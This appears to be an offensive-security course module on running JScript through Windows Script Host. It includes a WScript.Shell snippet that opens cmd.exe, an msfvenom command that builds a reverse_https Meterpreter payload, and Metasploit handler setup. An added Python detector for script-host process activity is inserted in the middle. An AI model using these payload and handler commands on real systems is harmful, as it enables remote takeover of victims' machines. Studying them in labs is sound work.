In this module we will learn how to get code execution on a victim's machine using JavaScript.

Execution Of JScript on Windows

First, let’s check the default application that Windows uses to run JavaScript files.

As we can see, Windows uses Windows Script Host to run JavaScript files.

Now let’s test what we can do with that.

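  1. We can create a WScript.Shell object using ActiveXObject to interact with Windows Script Host.
  2. Execute commands via the WScript.Shell object.

// Create a WScript.Shell COM object through Windows Script Host
var shell = new ActiveXObject("WScript.Shell");
// Launch cmd.exe as a new process
var res = shell.Run("cmd.exe");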

Now let’s save and run our file.

As we can see, the script executed and opened a new CMD window.
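From the defender's side, the behaviour shown above (a .js file handed to Windows Script Host, which then opens cmd.exe) is visible in process-creation telemetry. The following is an added example, not part of the original post: it applies two detection rules to constructed events that use Sysmon Event ID 1 field names. The watch lists, path prefixes and sample events are assumptions to tune locally.

```python
import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}               # Windows Script Host binaries
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe"}  # assumed watch list, tune locally
USER_WRITABLE = ("\\users\\", "\\windows\\temp\\")          # assumed path prefixes, tune locally

# Constructed events (not from the original page), using Sysmon Event ID 1 field names.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\alice\Downloads\test file.js"'},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe"'},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe"'},
    {"Image": r"C:\Windows\System32\cscript.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r'cscript.exe //nologo "C:\Program Files\Vendor\inventory.js"'},
]

def exe_name(path):
    """Lower-cased file name of a Windows path, regardless of the OS running this code."""
    return ntpath.basename(path).lower()

def script_args(command_line):
    """Return .js/.jse arguments, keeping quoted paths that contain spaces intact."""
    tokens = [q or u for q, u in re.findall(r'"([^"]+)"|(\S+)', command_line)]
    return [t for t in tokens if t.lower().endswith((".js", ".jse"))]

def classify(event):
    """Return the names of the rules this process-creation event matches."""
    hits = []
    image, parent = exe_name(event["Image"]), exe_name(event["ParentImage"])
    # Rule 1: a script host started a command interpreter (what shell.Run("cmd.exe") produces).
    if parent in SCRIPT_HOSTS and image in SHELL_CHILDREN:
        hits.append("wsh_spawned_shell")
    # Rule 2: a script host was handed a .js/.jse file from a user-writable location.
    if image in SCRIPT_HOSTS and any(
            p in s.lower() for s in script_args(event["CommandLine"]) for p in USER_WRITABLE):
        hits.append("wsh_ran_user_writable_script")
    return hits

def detect(events):
    """Return (event index, rule names) for every event that matched at least one rule."""
    return [(i, hits) for i, e in enumerate(events) if (hits := classify(e))]

if __name__ == "__main__":
    for index, rules in detect(SAMPLE_EVENTS):
        print(index, rules, SAMPLE_EVENTS[index]["CommandLine"])
```

The third and fourth sample events are benign controls: a shell started from Explorer, and a script host running a script from outside the user-writable prefixes.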

JScript Meterpreter Dropper

Let’s create a Meterpreter payload:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.16 LPORT=443 EXITFUNC=thread -f exe -o met.exe

Now let’s open our multi handler:

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set lhost eth0
msf6 exploit(multi/handler) > set lport 443
msf6 exploit(multi/handler) > set exitfunc thread
msf6 exploit(multi/handler) > exploit